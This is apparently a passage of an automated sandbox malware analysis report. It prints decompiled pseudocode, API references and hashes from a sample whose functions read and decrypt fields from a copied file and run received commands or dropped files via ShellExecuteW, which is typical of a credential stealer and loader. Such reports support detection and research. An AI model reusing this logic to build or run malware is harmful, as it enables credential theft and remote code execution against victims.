				void* _t17;
				intOrPtr* _t19;

				_t13 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
				_t17 =  *((intOrPtr*)( *0x40e044))(0x40, 0x400);
				GetLocaleInfoW(GetUserDefaultLCID(), 0x1001, _t13, 0x104);
				wsprintfW(_t17,  *0x40e47c, _t13);
				_t19 = _a4;
				 *_t19 = E0040A503( *_t19, _t17);
				LocalFree(_t13);
				LocalFree(_t17);
				return 1;
			}

0x0040907e
0x0040908f
0x004090a3
0x004090ad
0x004090b3
0x004090c3
0x004090c5
0x004090cc
0x004090d9

APIs

GetUserDefaultLCID.KERNEL32(00001001,00000000,00000104,?,00409A50,00000000), ref: 0040909C
GetLocaleInfoW.KERNEL32(00000000,?,00409A50,00000000,?,?,?,?,?,?,?,?,?,?,?,00407B1E), ref: 004090A3
wsprintfW.USER32 ref: 004090AD

Part of subcall function 0040A503: lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,00408633), ref: 0040A516
Part of subcall function 0040A503: lstrlenW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A51D
Part of subcall function 0040A503: LocalAlloc.KERNEL32(00000040,00000000,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A533
Part of subcall function 0040A503: GlobalFree.KERNEL32(?), ref: 0040A550

LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B1E), ref: 004090C5
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B1E), ref: 004090CC

Memory Dump Source

Source File: 00000014.00000002.439745303.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.440168036.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: FreeLocal$lstrlen$AllocDefaultGlobalInfoLocaleUserwsprintf
String ID:
API String ID: 539592093-0
Opcode ID: 76169cde5809fa79702d2641542e8c4a75ae3637547db9aa1a8f316083ef7260
Instruction ID: 624d8c4e8efa692e5b23cff9d3e49fd3310a2e312a93838384a0c37449368444
Opcode Fuzzy Hash: 76169cde5809fa79702d2641542e8c4a75ae3637547db9aa1a8f316083ef7260
Instruction Fuzzy Hash: 84F0C8B1200214BFF3005BA6AD89E6777ACEB48724F004435F748B7290CAB46C20866D

Uniqueness

Uniqueness Score: -1.00%

Function 00406468 Relevance: 6.1, APIs: 4, Instructions: 137encryptionCOMMON

Download Yara Rule

APIs

CryptStringToBinaryA.CRYPT32(0040687A,00000000), ref: 004064AB
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,?), ref: 0040655B
LocalFree.KERNEL32(00000000), ref: 00406575
LocalFree.KERNEL32(?), ref: 004065CA

Memory Dump Source

Source File: 00000014.00000002.439745303.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.440168036.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: FreeLocal$BinaryByteCharCryptMultiStringWide
String ID:
API String ID: 565018292-0
Opcode ID: df6aafc65f9139ff203c29d94f7da2d3df286550dae747009e72aef9e32236be
Instruction ID: ac64a0b193ce7f41f530b5697522d6c2b33bbf0bf2498a0822923da046ee8569
Opcode Fuzzy Hash: df6aafc65f9139ff203c29d94f7da2d3df286550dae747009e72aef9e32236be
Instruction Fuzzy Hash: 93417A71A00215AFEB14CBA6DD81FBEBBF8EF88710F104429F605F7290D774A9118B69

Uniqueness

Uniqueness Score: -1.00%

Function 0040177F Relevance: 4.6, APIs: 3, Instructions: 53COMMON

Download Yara Rule

APIs

StrCpyW.SHLWAPI(?,00000000), ref: 004017DB
LocalFree.KERNEL32(00000000), ref: 004017E2
LocalFree.KERNEL32(00000000), ref: 004017ED

Memory Dump Source

Source File: 00000014.00000002.439745303.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.440168036.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: FreeLocal
String ID:
API String ID: 2826327444-0
Opcode ID: af2a643a322c620d98a535cd9c71554de113ed27803ffe39f131d2213ba6c728
Instruction ID: 0e35f1b792878b3a1d48bea3d62df56abb982cd26097e817133252b33d58790c
Opcode Fuzzy Hash: af2a643a322c620d98a535cd9c71554de113ed27803ffe39f131d2213ba6c728
Instruction Fuzzy Hash: 5D01DF72200115FBEB188BAAED84FAB77ACEF48350F000434F605F72A0DAB0DD1096B8

Uniqueness

Uniqueness Score: -1.00%

Function 0040A1FE Relevance: 1.3, Strings: 1, Instructions: 28COMMON

Download Yara Rule

Strings

iqroq5112542785672901323, xrefs: 0040A20C

Memory Dump Source

Source File: 00000014.00000002.439745303.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.440168036.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID:
String ID: iqroq5112542785672901323
API String ID: 0-2937663778
Opcode ID: 154cf3943ec8f6ec358a9f88ce128c597753e00986442f5e2a7e9fe34025ec4f
Instruction ID: dfc9d6c5e4fbc171aed8fd1b755dd2b3d2cfba8e4e0761005cd4e136b75d37ee
Opcode Fuzzy Hash: 154cf3943ec8f6ec358a9f88ce128c597753e00986442f5e2a7e9fe34025ec4f
Instruction Fuzzy Hash: D0E06D315012256AE724D7F5EC49FAA77AC9B09214F1000A5E915E6380EAB4EE148AAA

Uniqueness

Uniqueness Score: -1.00%

Function 004017FA Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.439745303.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.440168036.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc3abbeb411ed60e74f6ddeee8f85890bcfd83d19f0f3362f9051b6dc7ab35d3
Instruction ID: 395fbee96700efcf13294783634cb000bafa4e7164606bd30abd8be72a67e938
Opcode Fuzzy Hash: cc3abbeb411ed60e74f6ddeee8f85890bcfd83d19f0f3362f9051b6dc7ab35d3
Instruction Fuzzy Hash: 79014472201121BFD7259B9BDC49E9B7FACEF4A7A0B000035F608E7350D6709D10C7A4

Uniqueness

Uniqueness Score: -1.00%

Function 0041C17E Relevance: 66.9, APIs: 30, Strings: 8, Instructions: 431COMMON

Download Yara Rule

APIs

__invoke_watson_if_error.LIBCMTD ref: 0041C1C2
_wcscat_s.LIBCMTD ref: 0041C3DA

Part of subcall function 00429010: __errno.LIBCMTD ref: 00429064

__invoke_watson_if_error.LIBCMTD ref: 0041C3E3
_wcscat_s.LIBCMTD ref: 0041C412

Part of subcall function 00429010: _memset.LIBCMT ref: 004290EB
Part of subcall function 00429010: __errno.LIBCMTD ref: 00429129

__invoke_watson_if_error.LIBCMTD ref: 0041C41B
__errno.LIBCMTD ref: 0041C437

Part of subcall function 00419D50: __getptd_noexit.LIBCMTD ref: 00419D56

__errno.LIBCMTD ref: 0041C444
__errno.LIBCMTD ref: 0041C4A5
__invoke_watson_if_oneof.LIBCMTD ref: 0041C4AD
__errno.LIBCMTD ref: 0041C4B5
_wcscpy_s.LIBCMTD ref: 0041C4F2
__invoke_watson_if_error.LIBCMTD ref: 0041C4FB
__invoke_watson_if_oneof.LIBCMTD ref: 0041C59E
_wcscpy_s.LIBCMTD ref: 0041C5D6
__invoke_watson_if_error.LIBCMTD ref: 0041C5DF
__itow_s.LIBCMTD ref: 0041C1B9

Part of subcall function 0042B800: _xtow_s@20.LIBCMTD ref: 0042B82B

__errno.LIBCMTD ref: 0041C248
__errno.LIBCMTD ref: 0041C255
__strftime_l.LIBCMTD ref: 0041C279
__errno.LIBCMTD ref: 0041C2AA
__invoke_watson_if_oneof.LIBCMTD ref: 0041C2B2
__errno.LIBCMTD ref: 0041C2BA
_wcscpy_s.LIBCMTD ref: 0041C2F7
__invoke_watson_if_error.LIBCMTD ref: 0041C300
_wcscpy_s.LIBCMTD ref: 0041C353
__invoke_watson_if_error.LIBCMTD ref: 0041C35C
_wcscat_s.LIBCMTD ref: 0041C38D
__invoke_watson_if_error.LIBCMTD ref: 0041C396

Strings

hHY@, xrefs: 0041C584
t9j, xrefs: 0041C805
RL, xrefs: 0041C56E
_@, xrefs: 0041C1F0, 0041C1F6
t8j, xrefs: 0041C5AD
hHY@, xrefs: 0041C36B
h ]@, xrefs: 0041C375
,^@, xrefs: 0041C340, 0041C346

Memory Dump Source

Source File: 00000014.00000002.440482009.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_412000_F0geI.jbxd

Similarity

API ID: __errno$__invoke_watson_if_error$_wcscpy_s$__invoke_watson_if_oneof_wcscat_s$__getptd_noexit__itow_s__strftime_l_memset_xtow_s@20
String ID: _@$,^@$RL$h ]@$hHY@$hHY@$t8j$t9j
API String ID: 154763593-3339620195
Opcode ID: 881b4aeba09eb3c435e12e92552ecad2261c4f15f16f2ed09f10854b13da102d
Instruction ID: 3eb14a9a913676cf952d3c5baa468fbbeb682016143a5da59d3750aa6422998d
Opcode Fuzzy Hash: 881b4aeba09eb3c435e12e92552ecad2261c4f15f16f2ed09f10854b13da102d
Instruction Fuzzy Hash: C60271B4A80714AADB20DF50DC86FDF7374AB14746F1041AAF608B62C1D7BC9A94CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00406D26 Relevance: 47.7, APIs: 23, Strings: 4, Instructions: 419
fileCOMMON

Download Yara Rule

C-Code - Quality: 19%

			E00406D26(intOrPtr* __ecx, intOrPtr* __edx, intOrPtr _a4, char* _a8) {
				intOrPtr _v8;
				void* _v12;
				signed int _v16;
				signed int _v20;
				void* _v24;
				void* _v28;
				intOrPtr _v32;
				void* _v36;
				void* _v40;
				void* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed int _v60;
				intOrPtr _v64;
				void* _v68;
				void* _v72;
				signed int _v76;
				intOrPtr _v80;
				intOrPtr* _v84;
				intOrPtr* _v88;
				void* _v92;
				intOrPtr _t104;
				intOrPtr _t105;
				intOrPtr _t106;
				intOrPtr _t107;
				intOrPtr _t108;
				void* _t110;
				void* _t111;
				void* _t113;
				void* _t119;
				void* _t121;
				void* _t132;
				intOrPtr* _t133;
				void* _t140;
				void* _t142;
				char* _t144;
				void* _t146;
				void* _t147;
				void* _t160;
				int _t163;
				void* _t165;
				signed int _t167;
				void* _t190;
				void* _t191;
				void* _t196;
				void* _t209;
				void* _t210;
				signed int _t212;
				void* _t213;
				void* _t214;
				void* _t215;
				void* _t216;
				void* _t228;
				void* _t240;
				signed int _t241;
				void* _t264;
				intOrPtr _t265;
				void* _t267;
				void* _t270;
				void* _t271;
				intOrPtr _t273;
				intOrPtr* _t276;
				void* _t278;

				_v88 = __edx;
				_v84 = __ecx;
				if(_a8 == 0) {
					L50:
					return 0;
				}
				_t104 =  *0x40e38c; // 0x5057b8
				_v76 = _v76 & 0x00000000;
				_v48 = _t104;
				_t105 =  *0x40e380; // 0x5056f8
				_v80 = _t105;
				_t106 =  *0x40e2cc; // 0x4e5ae0
				_v52 = _t106;
				_t107 =  *0x40e320; // 0x4e5a60
				_v56 = _t107;
				_t108 =  *0x40e384; // 0x505770
				_v64 = _t108;
				_t110 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
				_t111 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
				_v36 = _t111;
				_t264 =  *((intOrPtr*)( *0x40e000))(_t110, _a4,  *0x40e300);
				_v68 = _t264;
				_t113 = E0040A69E( *0x40e000,  &_v36);
				_t209 = _v36;
				if(_t113 == 0) {
					L48:
					LocalFree(_t264);
					DeleteFileW(_t209);
					LocalFree(_t209);
					L49:
					goto L50;
				}
				_push(0);
				_push(_t209);
				_push(_t264);
				if( *((intOrPtr*)( *0x40e184))() == 0) {
					goto L48;
				}
				_t119 =  *((intOrPtr*)( *0x40e03c))(_t209, 0x80000000, 1, 0, 3, 0, 0);
				_v72 = _t119;
				_t270 =  *((intOrPtr*)( *0x40e14c))(_t119, 0);
				_t121 =  *((intOrPtr*)( *0x40e044))(0x40, _t270);
				_push(0);
				_push( &_v76);
				_t18 = _t270 - 1; // -1
				_v44 = _t121;
				_push(_t121);
				_push(_v72);
				if( *((intOrPtr*)( *0x40e088))() == 0) {
					L43:
					LocalFree(_v44);
					CloseHandle(_v72);
					DeleteFileW(_t209);
					if(_t264 != 0) {
						LocalFree(_t264);
					}
					if(_t209 != 0) {
						LocalFree(_t209);
					}
					return 1;
				}
				_t271 =  *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _a4, 0xffffffff, 0, 0, 0, 0);
				_t22 = _t271 + 0x40; // 0x40
				_t132 =  *((intOrPtr*)( *0x40e044))(0x40, _t22);
				_v40 = _t132;
				if(_t271 == 0) {
					L7:
					_push(_v40);
					_t133 =  *0x40e490; // 0x6d7fa7f0
					if( *_t133() != 0) {
						L42:
						 *0x40e4a8();
						LocalFree(_v40);
						goto L43;
					}
					_t228 = _v44;
					_t265 = _t228;
					_push(_t228);
					_v32 = _t265;
					_t273 = 1;
					if( *((intOrPtr*)( *0x40e198))() <= 0x200) {
						L41:
						_t264 = _v68;
						goto L42;
					}
					while(_t273 != 0) {
						_v60 = _v60 & 0x00000000;
						_t140 =  *((intOrPtr*)( *0x40e00c))(_t265, _v48);
						_v20 = _v20 | 0xffffffff;
						_t210 = _t140;
						_v16 = _v16 | 0xffffffff;
						if(_t210 == 0) {
							break;
						}
						_t211 = _t210 - _t265;
						if(_t210 - _t265 < 0) {
							break;
						}
						_t142 =  *((intOrPtr*)( *0x40e00c))(_t265, _v80);
						if(_t142 == 0) {
							_t273 = 0;
						} else {
							_v20 = _t142 - _t265;
						}
						_v8 = _t273;
						_t144 =  *((intOrPtr*)( *0x40e044))(0x40, 0x800);
						_a8 = _t144;
						_t146 =  *((intOrPtr*)( *0x40e044))(0x40, 0x800);
						_v24 = _t146;
						_t147 =  *((intOrPtr*)( *0x40e044))(0x40, 0x800);
						_push(_v20);
						_v28 = _t147;
						if(E0040A457(_t265,  &_a8,  *((intOrPtr*)( *0x40e198))() + _t211, _v48) == 0) {
							L38:
							LocalFree(_a8);
							LocalFree(_v24);
							LocalFree(_v28);
							_t212 = _v16;
							if(_t212 < 0) {
								break;
							}
							_t265 = _t265 +  *((intOrPtr*)( *0x40e198))(_v64) + _t212;
							_push(_t265);
							_v32 = _t265;
							if( *((intOrPtr*)( *0x40e198))() > 0x200) {
								continue;
							}
							break;
						} else {
							_t160 =  *((intOrPtr*)( *0x40e044))(0x40, 0x1000);
							_v12 = _t160;
							_t163 = MultiByteToWideChar(0xfde9, 0, _a8,  *((intOrPtr*)( *0x40e198))(_a8) + 1, 0, 0);
							_v20 = _t163;
							if(_t163 != 0) {
								_t267 = _t163 + _t163;
								_t196 =  *((intOrPtr*)( *0x40e044))(0x40, _t267);
								_t216 = _t196;
								MultiByteToWideChar(0xfde9, 0, _a8,  *((intOrPtr*)( *0x40e198))(_a8) + 1, _t216, _v20);
								 *((short*)(_t267 + _t216 - 2)) = 0;
								_v12 =  *((intOrPtr*)( *0x40e13c))(_v12, _t216);
								LocalFree(_t216);
								_t265 = _v32;
								_v60 = 1;
							}
							_t165 =  *((intOrPtr*)( *0x40e00c))(_t265, _v52);
							if(_t165 == 0) {
								L36:
								_t273 = 0;
								L37:
								LocalFree(_v12);
								goto L38;
							}
							_t273 = _v8;
							_t167 = _t165 - _t265;
							_v20 = _t167;
							if(_t167 < 0) {
								goto L37;
							}
							_t213 =  *((intOrPtr*)( *0x40e00c))(_t265, _v56);
							if(_t213 == 0) {
								goto L36;
							}
							_t214 = _t213 - _t265;
							if(_t214 >= 0) {
								_push(_t214);
								if(E0040A457(_t265,  &_v24,  *((intOrPtr*)( *0x40e198))() + _v20, _v52) != 0) {
									_v20 =  *((intOrPtr*)( *0x40e044))(0x40, 0x3f40);
									E00406468(_v24,  &_v20);
									_t240 =  *((intOrPtr*)( *0x40e00c))(_t265, _v64);
									if(_t240 == 0) {
										_t273 = 0;
									} else {
										_t241 = _t240 - _t265;
										_v92 = _t241;
										_v16 = _t241;
										if(_t241 >= 0) {
											_push(_t241);
											_v16 = _t241;
											if(E0040A457(_t265,  &_v28,  *((intOrPtr*)( *0x40e198))() + _t214, _v56) != 0) {
												_v16 =  *((intOrPtr*)( *0x40e044))(0x40, 0x3f40);
												if(E00406468(_v28,  &_v16) != 0 && _v60 != 0) {
													_t190 =  *((intOrPtr*)( *0x40e044))(0x40, 0x400);
													_t215 = _t190;
													_t191 =  *((intOrPtr*)( *0x40e0ec))(_t215,  *0x40e1a4, _v12, _v20, _v16);
													_t278 = _t278 + 0x14;
													if(_t191 >= lstrlenW( *0x40e1a4)) {
														_t276 = _v84;
														 *_t276 = E0040A503( *_t276, _t215);
													}
													if(_t215 != 0) {
														LocalFree(_t215);
													}
													_t265 = _v32;
													 *_v88 =  *_v88 + 1;
												}
												LocalFree(_v16);
												_t273 = _v8;
												_v16 = _v92;
											}
										}
									}
									LocalFree(_v20);
								}
							}
							goto L37;
						}
					}
					_t209 = _v36;
					goto L41;
				}
				_push(0);
				_push(0);
				_push(_t271);
				_push(_t132);
				_push(0xffffffff);
				_push(_a4);
				_push(0);
				_push(0xfde9);
				if( *((intOrPtr*)( *0x40e0e4))() != 0) {
					goto L7;
				} else {
					LocalFree(_v44);
					LocalFree(_t264);
					LocalFree(_t209);
					LocalFree(_v40);
					goto L49;
				}
			}

0x00406d33
0x00406d36
0x00406d39
0x0040720c
0x00000000
0x0040720c
0x00406d3f
0x00406d49
0x00406d4d
0x00406d50
0x00406d55
0x00406d58
0x00406d5d
0x00406d60
0x00406d65
0x00406d68
0x00406d6e
0x00406d78
0x00406d85
0x00406d96
0x00406d9c
0x00406da1
0x00406da4
0x00406da9
0x00406dae
0x004071f7
0x004071f8
0x004071ff
0x00407206
0x00407206
0x00000000
0x00407206
0x00406dbc
0x00406dbd
0x00406dbe
0x00406dc3
0x00000000
0x00000000
0x00406ddb
0x00406de5
0x00406df0
0x00406df5
0x00406e00
0x00406e02
0x00406e03
0x00406e06
0x00406e0a
0x00406e0b
0x00406e12
0x004071c3
0x004071c6
0x004071cf
0x004071d6
0x004071de
0x004071e1
0x004071e1
0x004071e9
0x004071ec
0x004071ec
0x00000000
0x004071f4
0x00406e36
0x00406e38
0x00406e3e
0x00406e40
0x00406e45
0x00406e83
0x00406e83
0x00406e86
0x00406e90
0x004071b4
0x004071b4
0x004071bd
0x00000000
0x004071bd
0x00406e96
0x00406ea0
0x00406ea2
0x00406ea3
0x00406ea6
0x00406eae
0x004071b1
0x004071b1
0x00000000
0x004071b1
0x00406eb4
0x00406ec4
0x00406ec9
0x00406ecb
0x00406ecf
0x00406ed1
0x00406ed7
0x00000000
0x00000000
0x00406edd
0x00406edf
0x00000000
0x00000000
0x00406eee
0x00406ef2
0x00406efb
0x00406ef4
0x00406ef6
0x00406ef6
0x00406f09
0x00406f0c
0x00406f13
0x00406f1d
0x00406f2c
0x00406f2f
0x00406f31
0x00406f3d
0x00406f53
0x00407168
0x0040716b
0x00407174
0x0040717d
0x00407183
0x00407188
0x00000000
0x00000000
0x00407196
0x0040719d
0x0040719e
0x004071a8
0x00000000
0x00000000
0x00000000
0x00406f59
0x00406f65
0x00406f76
0x00406f8b
0x00406f8d
0x00406f92
0x00406f9a
0x00406fa0
0x00406fab
0x00406fc5
0x00406fcd
0x00406fda
0x00406fdd
0x00406fe3
0x00406fe6
0x00406fe6
0x00406ff6
0x00406ffa
0x0040715d
0x0040715d
0x0040715f
0x00407162
0x00000000
0x00407162
0x00407000
0x00407003
0x00407005
0x00407008
0x00000000
0x00000000
0x00407019
0x0040701d
0x00000000
0x00000000
0x00407023
0x00407027
0x00407032
0x0040704a
0x00407064
0x00407067
0x00407077
0x0040707b
0x00407150
0x00407081
0x00407081
0x00407085
0x00407088
0x0040708b
0x00407096
0x0040709a
0x004070b0
0x004070ca
0x004070d4
0x004070e8
0x004070f3
0x00407108
0x0040710a
0x00407119
0x0040711b
0x00407127
0x00407127
0x0040712b
0x0040712e
0x0040712e
0x00407137
0x0040713a
0x0040713a
0x0040713f
0x00407148
0x0040714b
0x0040714b
0x004070b0
0x0040708b
0x00407155
0x00407155
0x0040704a
0x00000000
0x00407027
0x00406f53
0x004071ae
0x00000000
0x004071ae
0x00406e4f
0x00406e50
0x00406e51
0x00406e52
0x00406e53
0x00406e55
0x00406e58
0x00406e59
0x00406e62
0x00000000
0x00406e64
0x00406e67
0x00406e6e
0x00406e75
0x00407206
0x00000000
0x00407206

APIs

Part of subcall function 0040A69E: LocalFree.KERNEL32(00000000,?,?,0040B2D2), ref: 0040A701

LocalFree.KERNEL32(?), ref: 00406E67
LocalFree.KERNEL32(00000000), ref: 00406E6E
LocalFree.KERNEL32(?), ref: 00406E75
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,000000FF,00000001,00000000,00000000), ref: 00406F8B
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,000000FF,00000001,00000000,000000FF), ref: 00406FC5
LocalFree.KERNEL32(00000000), ref: 00406FDD
LocalFree.KERNEL32(?), ref: 004071C6
CloseHandle.KERNEL32(?), ref: 004071CF
DeleteFileW.KERNEL32(?), ref: 004071D6
LocalFree.KERNEL32(00000000), ref: 004071E1
LocalFree.KERNEL32(?), ref: 004071EC
LocalFree.KERNEL32(00000000), ref: 004071F8
DeleteFileW.KERNEL32(?), ref: 004071FF
LocalFree.KERNEL32(?), ref: 00407206

Strings

`ZN, xrefs: 00406D60
pWP, xrefs: 00406D68
ZN, xrefs: 00406D58
zh@, xrefs: 0040705E, 00407171, 0040703B

Memory Dump Source

Source File: 00000014.00000002.439745303.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.440168036.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: FreeLocal$ByteCharDeleteFileMultiWide$CloseHandle
String ID: `ZN$pWP$zh@$ZN
API String ID: 490209112-4096363373
Opcode ID: 2c3a4ddb3ba3feb35c1dcfdcabd393495abc93af20cb4a2b392ebe35311604a6
Instruction ID: f5ae4f6584a7baff5169ccf4eff2fbd10138ea77d31ce010a22c6c2769712165
Opcode Fuzzy Hash: 2c3a4ddb3ba3feb35c1dcfdcabd393495abc93af20cb4a2b392ebe35311604a6
Instruction Fuzzy Hash: D6E18471A00215AFEB04DFA6DD85EAEBBB5EF48310F004439FA15B7390DBB46911CB69

Uniqueness

Uniqueness Score: -1.00%

Function 004073C7 Relevance: 40.6, APIs: 22, Strings: 1, Instructions: 315
memoryCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E004073C7() {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				char _v24;
				void* _v28;
				intOrPtr _v32;
				void* __ecx;
				void* _t65;
				void* _t72;
				void* _t79;
				void* _t86;
				void* _t97;
				void* _t108;
				void* _t122;
				void* _t123;
				char _t128;
				void* _t137;
				void* _t139;
				void* _t140;
				void* _t142;
				void* _t144;
				void* _t183;
				intOrPtr _t188;
				void* _t189;
				void* _t190;
				void* _t192;
				void* _t194;
				void* _t196;
				void* _t198;
				void* _t199;
				void* _t202;
				signed int _t205;
				void* _t207;
				signed int _t209;
				void* _t211;
				signed int _t213;
				void* _t215;
				signed int _t217;
				char _t218;
				void* _t219;
				void* _t222;
				void* _t223;

				_t190 =  *((intOrPtr*)( *0x40e18c))(_t144,  *0x40e3a0, _t189);
				if(_t190 == 0) {
					L41:
					return 0;
				} else {
					while(1) {
						_t192 = _t190 + 8;
						_t65 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t192) + _t63);
						_t137 = _t65;
						_v20 = _t137;
						_t202 =  *((intOrPtr*)( *0x40e18c))(_t192,  *0x40e1f0);
						if(_t202 == 0) {
							break;
						}
						_t205 = _t202 - _t192 >> 1;
						if(E0040A3E4(_t192,  &_v20, 0, _t205) == 0) {
							_t137 = _v20;
							break;
						}
						_t194 = _t192 + _t205 * 2 + 2;
						_t72 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t194) + _t70);
						_t139 = _t72;
						_v12 = _t139;
						_t207 =  *((intOrPtr*)( *0x40e18c))(_t194,  *0x40e20c);
						if(_t207 == 0) {
							L36:
							LocalFree(_t139);
							L34:
							LocalFree(_v20);
							L39:
							L40:
							goto L41;
						}
						_t209 = _t207 - _t194 >> 1;
						if(E0040A3E4(_t194,  &_v12, 0, _t209) == 0) {
							_t139 = _v12;
							goto L36;
						}
						_t196 = _t194 + _t209 * 2 + 2;
						_t79 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t196) + _t77);
						_t140 = _t79;
						_v8 = _t140;
						_t211 =  *((intOrPtr*)( *0x40e18c))(_t196,  *0x40e20c);
						if(_t211 == 0) {
							L33:
							LocalFree(_t140);
							LocalFree(_v12);
							goto L34;
						}
						_t213 = _t211 - _t196 >> 1;
						if(E0040A3E4(_t196,  &_v8, 0, _t213) == 0) {
							_t140 = _v8;
							goto L33;
						}
						_t198 = _t196 + _t213 * 2 + 2;
						_t86 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t198) + _t84);
						_t137 = _t86;
						_v16 = _t137;
						_t215 =  *((intOrPtr*)( *0x40e18c))(_t198,  *0x40e228);
						if(_t215 == 0) {
							L31:
							LocalFree(_v12);
							LocalFree(_v20);
							L29:
							break;
						}
						_t217 = _t215 - _t198 >> 1;
						if(E0040A3E4(_t198,  &_v16, 0, _t217) == 0) {
							_t137 = _v16;
							goto L31;
						}
						_t15 = _t217 + 1; // 0x1
						_t199 = _v20;
						_v32 = _t198 + _t15 * 2;
						_push(_t199);
						if( *((intOrPtr*)( *0x40e074))() != 1) {
							_push(_t199);
							if( *((intOrPtr*)( *0x40e074))() != 2) {
								_push(_t199);
								if( *((intOrPtr*)( *0x40e074))() == 3) {
									ShellExecuteW(0, L"open", _v16, _v12, 0, 0);
								}
							}
							L24:
							_t97 = _v8;
							L25:
							LocalFree(_t97);
							LocalFree(_v12);
							LocalFree(_t199);
							LocalFree(_v16);
							_t190 =  *((intOrPtr*)( *0x40e18c))(_v32,  *0x40e3a0);
							if(_t190 != 0) {
								continue;
							}
							goto L40;
						}
						_t97 = _v8;
						if( *_t97 != 0x25) {
							goto L25;
						}
						_t21 = _t97 + 2; // 0x407c02
						_t218 = _t21;
						_v24 = _t218;
						_t108 =  *((intOrPtr*)( *0x40e044))(0x40, 0x410);
						_t137 = _t108;
						_v20 = _t137;
						_t219 =  *((intOrPtr*)( *0x40e18c))(_t218,  *0x40e364);
						if(_t219 == 0) {
							L28:
							LocalFree(_v8);
							LocalFree(_v12);
							LocalFree(_t199);
							LocalFree(_v16);
							goto L29;
						}
						_t221 = _t219 - _v24 >> 1;
						if(E0040A3E4(_v24,  &_v20, 0, _t219 - _v24 >> 1) == 0) {
							_t137 = _v20;
							goto L28;
						}
						_t142 =  *((intOrPtr*)( *0x40e044))(0x40, 0x410);
						_push(0x208);
						_push(_t142);
						_push(_v20);
						if( *((intOrPtr*)( *0x40e15c))() != 0) {
							_t222 = E0040A503(_t142, _v24 + 2 + _t221 * 2);
							_t122 =  *((intOrPtr*)( *0x40e044))(0x40, 0x209);
							_t183 = 8;
							_t123 = E0040A05F(_t122, _t183);
							_t143 = _t123;
							_push(_t222);
							_v28 = _t123;
							if( *((short*)(_t222 +  *((intOrPtr*)( *0x40e08c))() * 2 - 2)) != 0x5c) {
								_t188 =  *0x40e258; // 0x4e5d00
								_t222 = E0040A503(_t222, _t188);
							}
							_t142 = E0040A503(E0040A503(E0040A503(_t222, _t143), "."), _v16);
							_t128 =  *0x40e374; // 0x4fe2a0
							_v24 = _t128;
							_t223 = E00408619( &_v24);
							if(E00408495(_v12, _t223, _t142) != 0) {
								ShellExecuteW(0, 0, _t142, 0, 0, 0);
							}
							LocalFree(_v28);
							LocalFree(_t223);
						}
						LocalFree(_t142);
						LocalFree(_v20);
						goto L24;
					}
					LocalFree(_t137);
					goto L39;
				}
			}

0x004073dc
0x004073e0
0x0040776a
0x0040776e
0x004073e6
0x004073e8
0x004073ed
0x004073fe
0x0040740c
0x0040740f
0x00407414
0x00407418
0x00000000
0x00000000
0x00407423
0x00407433
0x0040775e
0x00000000
0x0040775e
0x00407447
0x00407452
0x00407460
0x00407463
0x00407468
0x0040746c
0x0040775b
0x0040774d
0x0040774d
0x00407762
0x00407762
0x00407768
0x00000000
0x00407769
0x00407477
0x00407487
0x00407758
0x00000000
0x00407758
0x0040749b
0x004074a6
0x004074b4
0x004074b7
0x004074bc
0x004074c0
0x00407743
0x00407744
0x0040774d
0x00000000
0x0040774d
0x004074cb
0x004074db
0x00407740
0x00000000
0x00407740
0x004074ef
0x004074fa
0x00407508
0x0040750b
0x00407510
0x00407514
0x00407732
0x00407735
0x00407727
0x00407727
0x00000000
0x00407727
